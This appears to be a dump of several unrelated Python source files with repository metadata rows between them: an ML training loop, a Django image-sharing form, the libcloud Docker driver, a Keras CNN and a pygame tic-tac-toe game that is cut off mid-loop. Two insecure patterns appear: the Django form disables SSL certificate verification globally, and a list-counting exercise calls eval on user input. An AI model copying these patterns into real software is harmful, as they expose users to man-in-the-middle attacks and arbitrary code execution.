# keep track of individual losses as well, aka dmd loss and ae loss.
epoch_loss_dmd_train = tf.keras.metrics.Mean()
epoch_loss_dmd_test = tf.keras.metrics.Mean()
epoch_loss_ae_train = tf.keras.metrics.Mean()
epoch_loss_ae_test = tf.keras.metrics.Mean()
epoch_loss_pred_train = tf.keras.metrics.Mean()
epoch_loss_pred_test = tf.keras.metrics.Mean()
# Build out the batches within a given epoch.
train_batch = data_train.shuffle(hyp_params['num_init_conds_training'], seed=42).batch(hyp_params["batch_size"],
drop_remainder=True)
# no need to shuffle test dataset.
test_batch = data_test.batch(hyp_params["batch_size"], drop_remainder=True)
# Learning rate scheduling plan. See Ch. 11 of O'Reilly.
if epoch % hyp_params["esteps"] == 0:
hyp_params['lr'] = (.2 ** count) * hyp_params["initial_learning_rate"]
adam_optimizer = tf.keras.optimizers.Adam(hyp_params['lr'])
count += 1
# Iterate through all the batches within an epoch.
for batch_training_data in train_batch:
# normalize batch
# Build terms that we differentiate (i.e. loss) and that we differentiate with respect to.
with tf.GradientTape() as tape:
# training=True is only needed if there are layers with different
# behavior during training versus inference (e.g. Dropout).
predictions_train = myMachine(batch_training_data)
ae_loss = predictions_train[3]
dmd_loss = predictions_train[2]
pred_loss = predictions_train[5]
loss_train = myLoss(batch_training_data, predictions_train)
# Compute gradients and then apply them to update weights within the Neural Network
gradients = tape.gradient(loss_train, myMachine.trainable_variables)
adam_optimizer.apply_gradients([
(grad, var)
for (grad, var) in zip(gradients, myMachine.trainable_variables)
if grad is not None
])
# Keep track of the loss after each batch.
epoch_loss_avg_train.update_state(loss_train)
epoch_loss_ae_train.update_state(ae_loss)
epoch_loss_dmd_train.update_state(dmd_loss)
epoch_loss_pred_train.update_state(pred_loss)
for batch_test_data in test_batch:
predictions_test = myMachine(batch_test_data)
dmd_test = predictions_test[2]
ae_test = predictions_test[3]
pred_test = predictions_test[5]
loss_test = myLoss(batch_test_data, predictions_test)
epoch_loss_avg_test.update_state(loss_test)
epoch_loss_ae_test.update_state(ae_test)
epoch_loss_dmd_test.update_state(dmd_test)
epoch_loss_pred_test.update_state(pred_test)
train_loss_results.append(epoch_loss_avg_train.result())
test_loss_results.append(epoch_loss_avg_test.result())
train_dmd_loss.append(epoch_loss_dmd_train.result())
train_ae_loss.append(epoch_loss_ae_train.result())
train_pred_loss.append(epoch_loss_pred_train.result())
test_dmd_loss.append(epoch_loss_dmd_test.result())
test_ae_loss.append(epoch_loss_ae_test.result())
test_pred_loss.append(epoch_loss_pred_test.result())
if epoch % 15 == 0:
# save plots in results folder. Plot the latent space, ae_reconstruction, and input_batch.
create_plots_fluid_pred(batch_training_data, predictions_train, hyp_params, epoch, save_folder, "train")
create_plots_fluid_pred(batch_test_data, predictions_test, hyp_params, epoch, save_folder, "test")
# fluid latent space plots.
create_plots_fluid_latent(predictions_train, hyp_params, epoch, save_folder, data_type="train")
create_plots_fluid_latent(predictions_test, hyp_params, epoch, save_folder, data_type="test")
if epoch % 10 == 0:
# plot latent, input and reconstructed ae latest batch data.
print_status_bar(epoch, hyp_params["num_epochs"], epoch_loss_avg_train.result(),
epoch_loss_avg_test.result(), time.process_time() - start_time,
log_file_path=os.path.join("results", save_folder, "log.txt"))
if epoch % 50 == 0:
# plot loss curves.
create_plots_of_loss(train_dmd_loss, train_ae_loss, test_dmd_loss, test_ae_loss, train_pred_loss,
test_pred_loss, myLoss.c1, myLoss.c2, myLoss.c3, epoch, save_folder)
# save loss curves in pickle files.
save_loss_curves(train_loss_results, test_loss_results, train_dmd_loss, test_dmd_loss, train_ae_loss,
test_ae_loss, train_pred_loss, test_pred_loss,
file_path=os.path.join("results", save_folder, "Loss"))
# save current machine.
myMachine.autoencoder.encoder.save(os.path.join("models", str("enc") + save_folder), save_format='save_weights')
myMachine.autoencoder.decoder.save(os.path.join("models", str("dec") + save_folder), save_format='save_weights')
epoch += 1
# final summary of the network, again for diagnostic purposes.
myMachine.summary()
| [
"oissan@predsci.com"
] | oissan@predsci.com |
b32d16281b9eb3a9c277b36b8d8018e725da75a7 | f2a02a48126c9980d2e3ccf9e10d4ea5578fa618 | /List/10.3.py | 1bfde8ab5ff304ff73552c7c2bd6d82ecd49076f | [] | no_license | MuhammadSaqib-Github/Python | 6a98087ba15e34ce27c91b270f91049337d134d4 | d91c97cbaf94e1ae45364319cf9ba9a5485c0597 | refs/heads/main | 2023-06-16T08:18:11.191132 | 2021-07-17T07:00:21 | 2021-07-17T07:00:21 | 386,861,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,009 | py | integers = eval(input("Enter numbers sep by commas"))
rep = []
for i in range(len(integers)):
time = 0
skip="yes"
for j in range(len(rep)):
if rep[j]==integers[i]:
skip="no"
if skip=="yes":
c = integers.count(integers[i])
print(integers[i] , "occued" ,c ,"time")
rep.append(integers[i])
'''
l = []
r = []
c = 0
index = []
for i in range(7):
n = eval(input("Enter a number: "))
l.append(n)
repeated = []
for i in range(len(l)):
c = 0
for j in range(len(l)):
if l[i] == l[j]:
c = c + 1
if c <= 1:
r.append(l[i])
if c > 1:
repeated.append(l[i])
index.append(c)
for i in range(len(r)):
print(r[i], "occured 1 time")
rep = []
for i in repeated:
if i not in rep:
rep.append(i)
ind = []
for i in index:
if i not in ind:
ind.append(i)
for i in range(len(ind)):
print(rep[i], "occured", ind[i], "times")
''' | [
"noreply@github.com"
] | MuhammadSaqib-Github.noreply@github.com |
2a5b07fdd14f3beca3bb61d3fb428d48f63432b3 | ee2521da7c10469d7e977758c3a07ae5c44a7e45 | /notilog-server | eb46ed41d2e0682cb0d3764996e9cc769118cd42 | [
"ISC"
] | permissive | mutantmonkey/notilog | d0d0206f1b33e31fb1f65085fed5941ff1c2763d | 0c5d87d9751bb9282e7319c44d0bce0a6542723f | refs/heads/master | 2021-01-02T08:40:52.350454 | 2014-06-09T03:43:06 | 2014-06-09T03:43:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 478 | #!/usr/bin/python3
import os.path
import yaml
from notilog import server
if __name__ == '__main__':
try:
import xdg.BaseDirectory
configpath = xdg.BaseDirectory.load_first_config('notilog/config.yml')
except:
configpath = os.path.expanduser('~/.config/notilog/config.yml')
config = yaml.safe_load(open(configpath))
s = server.PagerSyslogServer(config)
try:
s.serve_forever()
except KeyboardInterrupt:
s.close()
| [
"mutantmonkey@mutantmonkey.in"
] | mutantmonkey@mutantmonkey.in | |
2f45302e9a2e5bd5de2f101b8abe295f52b3d8b5 | cb3b5cb9d742fe38fc2a800189afeb1d262e4686 | /images/forms.py | ce7ad2aef6a4755ef27f700fb7ec72ef7cfee2b8 | [] | no_license | RunHuaOil/BookMarks | 0869cac7e203cad562e01fcc3eabcb9b22cd6176 | 4fd59506731d6049cfbe0a01efdfee50eed3a1b4 | refs/heads/master | 2021-01-01T08:19:15.173337 | 2017-07-18T08:03:49 | 2017-07-18T08:03:49 | 97,569,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,202 | py | from django import forms
from .models import Image
from uuslug import slugify
from urllib import request
from django.core.files.base import ContentFile
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
class ImageCreateForm(forms.ModelForm):
class Meta:
model = Image
fields = ['title', 'url', 'description']
widgets = {
'url': forms.HiddenInput,
}
def clean_url(self):
url = self.cleaned_data['url']
valid_extensions = ['jpg', 'jpeg']
extension = url.rsplit('.', 1)[1].lower()
if extension not in valid_extensions:
raise forms.ValidationError('只能上传 jpg jpeg 格式的图片')
return url
def save(self, commit=True):
# 下载分享里的图片链接
image = super(ImageCreateForm, self).save(commit=False)
image_url = self.cleaned_data['url']
image_name = "{}.{}".format(slugify(image.title), image_url.rsplit('.', 1)[1].lower())
response = request.urlopen(image_url)
image.image.save(image_name, ContentFile(response.read()), save=False)
if commit:
image.save()
return image
| [
"crh799250413@gmail.com"
] | crh799250413@gmail.com |
63d4d14065576f3188fdfb3e039c6033941abc39 | 5537eec7f43098d216d2b550678c8d10b2a26f09 | /venv/ansible/lib/python2.7/site-packages/libcloud/container/drivers/docker.py | faf5117cf33be7f44cf30b976707475c81a5fc89 | [] | no_license | wipro-sdx/Automation | f0ae1512b8d9d491d7bacec94c8906d06d696407 | a8c46217d0fbe51a71597b5db87cbe98ed19297a | refs/heads/master | 2021-07-08T11:09:05.314435 | 2018-05-02T07:18:54 | 2018-05-02T07:18:54 | 131,812,982 | 0 | 1 | null | 2020-07-23T23:22:33 | 2018-05-02T07:15:28 | Python | UTF-8 | Python | false | false | 23,277 | py | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import datetime
import shlex
import re
try:
import simplejson as json
except:
import json
from libcloud.utils.py3 import httplib
from libcloud.utils.py3 import b
from libcloud.common.base import JsonResponse, ConnectionUserAndKey
from libcloud.common.types import InvalidCredsError
from libcloud.container.base import (Container, ContainerDriver,
ContainerImage)
from libcloud.container.providers import Provider
from libcloud.container.types import ContainerState
VALID_RESPONSE_CODES = [httplib.OK, httplib.ACCEPTED, httplib.CREATED,
httplib.NO_CONTENT]
class DockerResponse(JsonResponse):
valid_response_codes = [httplib.OK, httplib.ACCEPTED, httplib.CREATED,
httplib.NO_CONTENT]
def parse_body(self):
if len(self.body) == 0 and not self.parse_zero_length_body:
return self.body
try:
# error responses are tricky in Docker. Eg response could be
# an error, but response status could still be 200
content_type = self.headers.get('content-type', 'application/json')
if content_type == 'application/json' or content_type == '':
body = json.loads(self.body)
else:
body = self.body
except ValueError:
m = re.search('Error: (.+?)"', self.body)
if m:
error_msg = m.group(1)
raise Exception(error_msg)
else:
raise Exception(
'ConnectionError: Failed to parse JSON response')
return body
def parse_error(self):
if self.status == 401:
raise InvalidCredsError('Invalid credentials')
return self.body
def success(self):
return self.status in self.valid_response_codes
class DockerException(Exception):
def __init__(self, code, message):
self.code = code
self.message = message
self.args = (code, message)
def __str__(self):
return "%s %s" % (self.code, self.message)
def __repr__(self):
return "DockerException %s %s" % (self.code, self.message)
class DockerConnection(ConnectionUserAndKey):
responseCls = DockerResponse
timeout = 60
def add_default_headers(self, headers):
"""
Add parameters that are necessary for every request
If user and password are specified, include a base http auth
header
"""
headers['Content-Type'] = 'application/json'
if self.user_id and self.key:
user_b64 = base64.b64encode(b('%s:%s' % (self.user_id, self.key)))
headers['Authorization'] = 'Basic %s' % (user_b64.decode('utf-8'))
return headers
class DockerContainerDriver(ContainerDriver):
"""
Docker container driver class.
>>> from libcloud.container.providers import get_driver
>>> driver = get_driver('docker')
>>> conn = driver(host='198.61.239.128', port=4243)
>>> conn.list_containers()
or connecting to http basic auth protected https host:
>>> conn = driver('user', 'pass', host='https://198.61.239.128', port=443)
connect with tls authentication, by providing a hostname, port, a private
key file (.pem) and certificate (.pem) file
>>> conn = driver(host='https://198.61.239.128',
>>> port=4243, key_file='key.pem', cert_file='cert.pem')
"""
type = Provider.DOCKER
name = 'Docker'
website = 'http://docker.io'
connectionCls = DockerConnection
supports_clusters = False
version = '1.24'
def __init__(self, key=None, secret=None, secure=False, host='localhost',
port=4243, key_file=None, cert_file=None):
"""
:param key: API key or username to used (required)
:type key: ``str``
:param secret: Secret password to be used (required)
:type secret: ``str``
:param secure: Whether to use HTTPS or HTTP. Note: Some providers
only support HTTPS, and it is on by default.
:type secure: ``bool``
:param host: Override hostname used for connections.
:type host: ``str``
:param port: Override port used for connections.
:type port: ``int``
:param key_file: Path to private key for TLS connection (optional)
:type key_file: ``str``
:param cert_file: Path to public key for TLS connection (optional)
:type cert_file: ``str``
:return: ``None``
"""
super(DockerContainerDriver, self).__init__(key=key, secret=secret,
secure=secure, host=host,
port=port,
key_file=key_file,
cert_file=cert_file)
if host.startswith('https://'):
secure = True
# strip the prefix
prefixes = ['http://', 'https://']
for prefix in prefixes:
if host.startswith(prefix):
host = host.strip(prefix)
if key_file or cert_file:
# docker tls authentication-
# https://docs.docker.com/articles/https/
# We pass two files, a key_file with the
# private key and cert_file with the certificate
# libcloud will handle them through LibcloudHTTPSConnection
if not (key_file and cert_file):
raise Exception(
'Needs both private key file and '
'certificate file for tls authentication')
self.connection.key_file = key_file
self.connection.cert_file = cert_file
self.connection.secure = True
else:
self.connection.secure = secure
self.connection.host = host
self.connection.port = port
def install_image(self, path):
"""
Install a container image from a remote path.
:param path: Path to the container image
:type path: ``str``
:rtype: :class:`libcloud.container.base.ContainerImage`
"""
payload = {
}
data = json.dumps(payload)
result = self.connection.request('/v%s/images/create?fromImage=%s' %
(self.version, path), data=data,
method='POST')
if "errorDetail" in result.body:
raise DockerException(None, result.body)
try:
# get image id
image_id = re.findall(
r'{"status":"Download complete"'
r',"progressDetail":{},"id":"\w+"}',
result.body)[-1]
image_id = json.loads(image_id).get('id')
except:
raise DockerException(None, 'failed to install image')
image = ContainerImage(
id=image_id,
name=path,
path=path,
version=None,
driver=self.connection.driver,
extra={})
return image
def list_images(self):
"""
List the installed container images
:rtype: ``list`` of :class:`libcloud.container.base.ContainerImage`
"""
result = self.connection.request('/v%s/images/json' %
(self.version)).object
images = []
for image in result:
try:
name = image.get('RepoTags')[0]
except:
name = image.get('Id')
images.append(ContainerImage(
id=image.get('Id'),
name=name,
path=name,
version=None,
driver=self.connection.driver,
extra={
"created": image.get('Created'),
"size": image.get('Size'),
"virtual_size": image.get('VirtualSize'),
},
))
return images
def list_containers(self, image=None, all=True):
"""
List the deployed container images
:param image: Filter to containers with a certain image
:type image: :class:`libcloud.container.base.ContainerImage`
:param all: Show all container (including stopped ones)
:type all: ``bool``
:rtype: ``list`` of :class:`libcloud.container.base.Container`
"""
if all:
ex = '?all=1'
else:
ex = ''
try:
result = self.connection.request(
"/v%s/containers/json%s" % (self.version, ex)).object
except Exception as exc:
errno = getattr(exc, 'errno', None)
if errno == 111:
raise DockerException(
errno,
'Make sure docker host is accessible'
'and the API port is correct')
raise
containers = [self._to_container(value) for value in result]
return containers
def deploy_container(self, name, image, parameters=None, start=True,
command=None, hostname=None, user='',
stdin_open=True, tty=True,
mem_limit=0, ports=None, environment=None, dns=None,
volumes=None, volumes_from=None,
network_disabled=False, entrypoint=None,
cpu_shares=None, working_dir='', domainname=None,
memswap_limit=0, port_bindings=None,
network_mode='bridge', labels=None):
"""
Deploy an installed container image
For details on the additional parameters see : http://bit.ly/1PjMVKV
:param name: The name of the new container
:type name: ``str``
:param image: The container image to deploy
:type image: :class:`libcloud.container.base.ContainerImage`
:param parameters: Container Image parameters
:type parameters: ``str``
:param start: Start the container on deployment
:type start: ``bool``
:rtype: :class:`Container`
"""
command = shlex.split(str(command))
if port_bindings is None:
port_bindings = {}
params = {
'name': name
}
payload = {
'Hostname': hostname,
'Domainname': domainname,
'ExposedPorts': ports,
'User': user,
'Tty': tty,
'OpenStdin': stdin_open,
'StdinOnce': False,
'Memory': mem_limit,
'AttachStdin': True,
'AttachStdout': True,
'AttachStderr': True,
'Env': environment,
'Cmd': command,
'Dns': dns,
'Image': image.name,
'Volumes': volumes,
'VolumesFrom': volumes_from,
'NetworkDisabled': network_disabled,
'Entrypoint': entrypoint,
'CpuShares': cpu_shares,
'WorkingDir': working_dir,
'MemorySwap': memswap_limit,
'PublishAllPorts': True,
'PortBindings': port_bindings,
'NetworkMode': network_mode,
'Labels': labels,
}
data = json.dumps(payload)
try:
result = self.connection.request('/v%s/containers/create'
% (self.version),
data=data,
params=params, method='POST')
except Exception as e:
message = e.message or str(e)
if message.startswith('No such image:'):
raise DockerException(None, 'No such image: %s' % image.name)
else:
raise DockerException(None, e)
id_ = result.object['Id']
payload = {
'Binds': [],
'PublishAllPorts': True,
'PortBindings': port_bindings,
}
data = json.dumps(payload)
if start:
result = self.connection.request(
'/v%s/containers/%s/start' %
(self.version, id_), data=data,
method='POST')
return self.get_container(id_)
def get_container(self, id):
"""
Get a container by ID
:param id: The ID of the container to get
:type id: ``str``
:rtype: :class:`libcloud.container.base.Container`
"""
result = self.connection.request("/v%s/containers/%s/json" %
(self.version, id)).object
return self._to_container(result)
def start_container(self, container):
"""
Start a container
:param container: The container to be started
:type container: :class:`libcloud.container.base.Container`
:return: The container refreshed with current data
:rtype: :class:`libcloud.container.base.Container`
"""
payload = {
'Binds': [],
'PublishAllPorts': True,
}
data = json.dumps(payload)
result = self.connection.request(
'/v%s/containers/%s/start' %
(self.version, container.id),
method='POST', data=data)
if result.status in VALID_RESPONSE_CODES:
return self.get_container(container.id)
else:
raise DockerException(result.status,
'failed to start container')
def stop_container(self, container):
"""
Stop a container
:param container: The container to be stopped
:type container: :class:`libcloud.container.base.Container`
:return: The container refreshed with current data
:rtype: :class:`libcloud.container.base.Container`
"""
result = self.connection.request('/v%s/containers/%s/stop' %
(self.version, container.id),
method='POST')
if result.status in VALID_RESPONSE_CODES:
return self.get_container(container.id)
else:
raise DockerException(result.status,
'failed to stop container')
def restart_container(self, container):
"""
Restart a container
:param container: The container to be stopped
:type container: :class:`libcloud.container.base.Container`
:return: The container refreshed with current data
:rtype: :class:`libcloud.container.base.Container`
"""
data = json.dumps({'t': 10})
# number of seconds to wait before killing the container
result = self.connection.request('/v%s/containers/%s/restart' %
(self.version, container.id),
data=data, method='POST')
if result.status in VALID_RESPONSE_CODES:
return self.get_container(container.id)
else:
raise DockerException(result.status,
'failed to restart container')
def destroy_container(self, container):
"""
Remove a container
:param container: The container to be destroyed
:type container: :class:`libcloud.container.base.Container`
:return: True if the destroy was successful, False otherwise.
:rtype: ``bool``
"""
result = self.connection.request('/v%s/containers/%s' % (self.version,
container.id),
method='DELETE')
return result.status in VALID_RESPONSE_CODES
def ex_list_processes(self, container):
"""
List processes running inside a container
:param container: The container to list processes for.
:type container: :class:`libcloud.container.base.Container`
:rtype: ``str``
"""
result = self.connection.request("/v%s/containers/%s/top" %
(self.version, container.id)).object
return result
def ex_rename_container(self, container, name):
"""
Rename a container
:param container: The container to be renamed
:type container: :class:`libcloud.container.base.Container`
:param name: The new name
:type name: ``str``
:rtype: :class:`libcloud.container.base.Container`
"""
result = self.connection.request('/v%s/containers/%s/rename?name=%s'
% (self.version, container.id, name),
method='POST')
if result.status in VALID_RESPONSE_CODES:
return self.get_container(container.id)
def ex_get_logs(self, container, stream=False):
"""
Get container logs
If stream == True, logs will be yielded as a stream
From Api Version 1.11 and above we need a GET request to get the logs
Logs are in different format of those of Version 1.10 and below
:param container: The container to list logs for
:type container: :class:`libcloud.container.base.Container`
:param stream: Stream the output
:type stream: ``bool``
:rtype: ``bool``
"""
payload = {}
data = json.dumps(payload)
if float(self._get_api_version()) > 1.10:
result = self.connection.request(
"/v%s/containers/%s/logs?follow=%s&stdout=1&stderr=1" %
(self.version, container.id, str(stream))).object
logs = result
else:
result = self.connection.request(
"/v%s/containers/%s/attach?logs=1&stream=%s&stdout=1&stderr=1"
% (self.version, container.id, str(stream)),
method='POST',
data=data)
logs = result.body
return logs
def ex_search_images(self, term):
"""Search for an image on Docker.io.
Returns a list of ContainerImage objects
>>> images = conn.ex_search_images(term='mistio')
>>> images
[<ContainerImage: id=rolikeusch/docker-mistio...>,
<ContainerImage: id=mist/mistio, name=mist/mistio,
driver=Docker ...>]
:param term: The search term
:type term: ``str``
:rtype: ``list`` of :class:`libcloud.container.base.ContainerImage`
"""
term = term.replace(' ', '+')
result = self.connection.request('/v%s/images/search?term=%s' %
(self.version, term)).object
images = []
for image in result:
name = image.get('name')
images.append(
ContainerImage(
id=name,
path=name,
version=None,
name=name,
driver=self.connection.driver,
extra={
"description": image.get('description'),
"is_official": image.get('is_official'),
"is_trusted": image.get('is_trusted'),
"star_count": image.get('star_count'),
},
))
return images
def ex_delete_image(self, image):
"""
Remove image from the filesystem
:param image: The image to remove
:type image: :class:`libcloud.container.base.ContainerImage`
:rtype: ``bool``
"""
result = self.connection.request('/v%s/images/%s' % (self.version,
image.name),
method='DELETE')
return result.status in VALID_RESPONSE_CODES
def _to_container(self, data):
"""
Convert container in Container instances
"""
try:
name = data.get('Name').strip('/')
except:
try:
name = data.get('Names')[0].strip('/')
except:
name = data.get('Id')
state = data.get('State')
if isinstance(state, dict):
status = data.get(
'Status',
state.get('Status')
if state is not None else None)
else:
status = data.get('Status')
if 'Exited' in status:
state = ContainerState.STOPPED
elif status.startswith('Up '):
state = ContainerState.RUNNING
else:
state = ContainerState.STOPPED
image = data.get('Image')
ports = data.get('Ports', [])
created = data.get('Created')
if isinstance(created, float):
created = ts_to_str(created)
extra = {
'id': data.get('Id'),
'status': data.get('Status'),
'created': created,
'image': image,
'ports': ports,
'command': data.get('Command'),
'sizerw': data.get('SizeRw'),
'sizerootfs': data.get('SizeRootFs'),
}
ips = []
if ports is not None:
for port in ports:
if port.get('IP') is not None:
ips.append(port.get('IP'))
return Container(
id=data['Id'],
name=name,
image=ContainerImage(
id=data.get('ImageID', None),
path=image,
name=image,
version=None,
driver=self.connection.driver
),
ip_addresses=ips,
state=state,
driver=self.connection.driver,
extra=extra)
def _get_api_version(self):
"""
Get the docker API version information
"""
result = self.connection.request('/version').object
result = result or {}
api_version = result.get('ApiVersion')
return api_version
def ts_to_str(timestamp):
"""
Return a timestamp as a nicely formated datetime string.
"""
date = datetime.datetime.fromtimestamp(timestamp)
date_string = date.strftime("%d/%m/%Y %H:%M %Z")
return date_string
| [
"admin@example.com"
] | admin@example.com |
a6949561c9689c5ddb20528b163889e51ee51477 | fee1f49d0e5187a4974393097d1125fc49e0b28a | /api/category/migrations/0001_initial.py | 82e650ac3786122419420c54ec5a169148727481 | [] | no_license | pratikmishra356/ecomm-backend | 883e00eeb0f065f1c6f20140546a483fd2d76ef3 | 92d4a34805623dd5a14196a2d72713fc15c57a51 | refs/heads/main | 2023-06-11T20:53:45.339834 | 2021-06-30T11:38:36 | 2021-06-30T11:38:36 | 335,620,757 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | # Generated by Django 3.0.8 on 2021-01-24 19:11
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('description', models.CharField(max_length=250)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
| [
"pratikmishra@Pratiks-MacBook-Air.local"
] | pratikmishra@Pratiks-MacBook-Air.local |
c7317dcb9c2305e208510d6576bf543713ab6d96 | 6b1de0812ad7ec46e8128c19d43d95d97b5934ba | /InitialModel.py | 4728df0d84e9b2ee926c917e9a6e5ac489fcf985 | [] | no_license | InertFluid/KinshipVerification | 7b8e2ecf33d7b18395a669cad048a990a2c411c6 | 7a2295cdbc0636da7f667e9dcc5cedba639351dc | refs/heads/master | 2020-03-17T13:31:40.004096 | 2019-01-20T12:13:08 | 2019-01-20T12:13:08 | 133,635,276 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,111 | py | from keras.models import Sequential
from keras.layers import Convolution2D
from keras.layers import MaxPooling2D
from keras.layers import Flatten
from keras.layers import Dense
from keras.optimizers import SGD
from keras.initializers import RandomNormal
WTInit = RandomNormal(mean=0.0, stddev=0.01, seed=5)
model=Sequential()
model.add(Convolution2D(16, (5, 5), input_shape=(64, 64, 6), activation="relu", kernel_initializer=WTInit, bias_initializer="zeros"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(64, (5, 5), activation="relu", kernel_initializer=WTInit, bias_initializer="zeros"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(128, (5, 5), activation="relu", kernel_initializer=WTInit, bias_initializer="zeros"))
model.add(Flatten())
model.add(Dense(640, activation="relu", kernel_initializer=WTInit, bias_initializer="zeros"))
model.add(Dense(2, activation="softmax", kernel_initializer=WTInit, bias_initializer="zeros"))
sgd = SGD(lr= 0.01, momentum=0.9, decay=0.005)
model.compile(optimizer=sgd, loss="categorical_crossentropy")
print(model.summary())
| [
"noreply@github.com"
] | InertFluid.noreply@github.com |
1c2e414ee6870262c1e73bf8a1eb3026494988d6 | 7a4ecd59965312425cc9dec10ee09c5d145ea149 | /main.py | 2caf908ced15a5a1454c280fddf78c0bf89e92ac | [] | no_license | j-yeskay/tictactoe-pygame | 192a3fb3f01f55c6f0442b8b7bccf992685a1186 | 3de617405e7b7c9d7a816de17c9a21dd7a999030 | refs/heads/master | 2022-12-05T07:10:35.592225 | 2020-08-28T06:03:45 | 2020-08-28T06:03:45 | 290,964,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,120 | py | import pygame
pygame.init()
#***WINDOW**#
screen = pygame.display.set_mode((420, 625))
pygame.display.set_caption("Tic Tac Toe")
xolist = ["1", "2", "3",
"4", "5", "6",
"7", "8", "9"]
match_status = True
play_count = 0
#***TO AVOID MULTIPLE ATTEMPTS IN ONE BOX***#
b0, b1, b2, b3, b4, b5, b6, b7, b8 = True, True, True, True, True, True, True, True, True
#***FIRST TURN***#
turn = "X"
#***INITIALIZING FONTS***#
turn_font = pygame.font.Font("Manterah.ttf", 100)
topbar_font = pygame.font.Font("Manterah.ttf", 32)
#***BACKEND LOGIC***#
def checkvertical():
if xolist[0] == xolist[3] == xolist[6] == "X"or xolist[1] == xolist[4] == xolist[7] == "X"or xolist[2] == xolist[5] == xolist[8] == "X":
return "x won"
elif xolist[0] == xolist[3] == xolist[6] == "O"or xolist[1] == xolist[4] == xolist[7] == "O"or xolist[2] == xolist[5] == xolist[8] == "O":
return "o won"
def checkhorizontal():
if xolist[0] == xolist[1] == xolist[2] == "X"or xolist[3] == xolist[4] == xolist[5] == "X"or xolist[6] == xolist[7] == xolist[8] == "X":
return "x won"
elif xolist[0] == xolist[1] == xolist[2] == "O"or xolist[3] == xolist[4] == xolist[5] == "O"or xolist[6] == xolist[7] == xolist[8] == "O":
return "o won"
def checkdiagonal():
if xolist[0] == xolist[4] == xolist[8] == "X"or xolist[2] == xolist[4] == xolist[6] == "X":
return "x won"
elif xolist[0] == xolist[4] == xolist[8] == "O"or xolist[2] == xolist[4] == xolist[6] == "O":
return "o won"
def checkwin():
if checkdiagonal() == "x won" or checkhorizontal() == "x won" or checkvertical() == "x won":
global result
global match_status
result = "X HAS WON"
match_status = False
return result
elif checkdiagonal() == "o won" or checkhorizontal() == "o won" or checkvertical() == "o won":
result = "O HAS WON"
match_status = False
return result
def turn_topbar_text():
if match_status == True and play_count != 9:
pygame.draw.rect(screen, (255, 255, 255), (0, 0, 420, 75))
topbar_text = topbar_font.render(
str(turn) + "'s Turn", True, (0, 0, 0))
screen.blit(topbar_text, (150, 20))
elif match_status == False:
pygame.draw.rect(screen, (255, 255, 255), (0, 0, 420, 75))
topbar_text = topbar_font.render(str(result), True, (0, 0, 0))
screen.blit(topbar_text, (150, 20))
else:
pygame.draw.rect(screen, (255, 255, 255), (0, 0, 420, 75))
topbar_text = topbar_font.render("GAME DRAWN", True, (0, 0, 0))
screen.blit(topbar_text, (150, 20))
def button_click(x, y):
global play_count
global turn
play_count += 1
if turn == "X":
x_text = turn_font.render("X", True, (255, 255, 255))
screen.blit(x_text, (x, y))
turn = "O"
else:
y_text = turn_font.render("O", True, (255, 255, 255))
screen.blit(y_text, (x, y))
turn = "X"
running = True
while running:
turn_topbar_text()
#***VERTICAL LINES***#
pygame.draw.line(screen, (255, 255, 255), (147, 100), (147, 598), 1)
pygame.draw.line(screen, (255, 255, 255), (270, 100), (270, 598), 1)
#***HORIZONTAL LINES***#
pygame.draw.line(screen, (255, 255, 255), (25, 266), (395, 266), 1)
pygame.draw.line(screen, (255, 255, 255), (25, 432), (395, 432), 1)
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
mouse_position = pygame.mouse.get_pos()
#***BUTTON EVENTS***#
if 25 + 122 > mouse_position[0] > 25 and 100 + 166 > mouse_position[1] > 100 and b0 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 0
b0 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(60, 150)
checkwin()
if 147 + 123 > mouse_position[0] > 147 and 100 + 166 > mouse_position[1] > 100 and b1 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 1
b1 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(182, 150)
checkwin()
if 270 + 125 > mouse_position[0] > 270 and 100 + 166 > mouse_position[1] > 100 and b2 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 2
b2 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(305, 150)
checkwin()
if 25 + 122 > mouse_position[0] > 25 and 266 + 166 > mouse_position[1] > 266 and b3 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 3
b3 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(60, 316)
checkwin()
if 147 + 123 > mouse_position[0] > 147 and 266 + 166 > mouse_position[1] > 266 and b4 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 4
b4 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(182, 316)
checkwin()
if 270 + 125 > mouse_position[0] > 270 and 266 + 166 > mouse_position[1] > 266 and b5 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 5
b5 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(305, 316)
checkwin()
